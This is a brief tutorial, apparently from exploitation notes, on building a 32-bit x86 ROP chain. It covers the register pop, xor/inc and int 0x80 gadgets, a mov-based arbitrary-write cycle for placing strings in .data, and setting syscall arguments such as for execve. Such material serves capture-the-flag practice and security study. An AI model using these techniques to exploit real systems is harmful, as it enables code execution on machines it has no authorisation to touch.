- Creating a shellcode / pseudo-shellcode before starting to build the ROP-chain is useful and will be a reference of what you need, especially when trying to do something special in the ROP (eg. not execve ;) )
This is a quick trick to build a ropchain :)
-
First, you need to find certain gadgets for needed operations:
a.
popgadget for each of the registersebx,ecx,edx(for setting them up as arguments for syscall)b.
xorandincgadgets foreax(for setting up the syscall number)c. syscall (
int 0x80) gadget (obvious...)d. This is the interesting part: find any couple of registers you can satisfy the following gadget needs with:
- `mov dword ptr [r1], r2` - `pop` gadgets for both registers - `xor` gadget for `r2` -
Now you can start building your ropchain. I will list here the ways to use those gadgets.
-
For arbitrary writes (e.g, writing to
.datafor storing strings) - you will use the register couple. You will use the following stack layout cycle for every 4 bytes of the string on the stack:pop r1 <write loc> pop r2 <4 bytes from string> mov dword ptr [r1], r2
What happens here is that the write location is
poped intor1, the string ispoped intor2, and thenr2is moved to the address stored inr1, hence the string is written to the write location. The reason I also specified axorgadget forr2is for null-byte at the end of the string, and for zero-ing out location for later manipulation of registers :) -
For setting up the registers as syscall argument, you place an address pointing to the value you want to write to them, and then
popthem. Most common is pointing to a location filled with zeros in.datato zero out the registers. This can obviously be replaced withxorgadget, but those are less common for registers other thaneax. -
eax's gadgets and the syscall gadget are obviously used for the syscall :)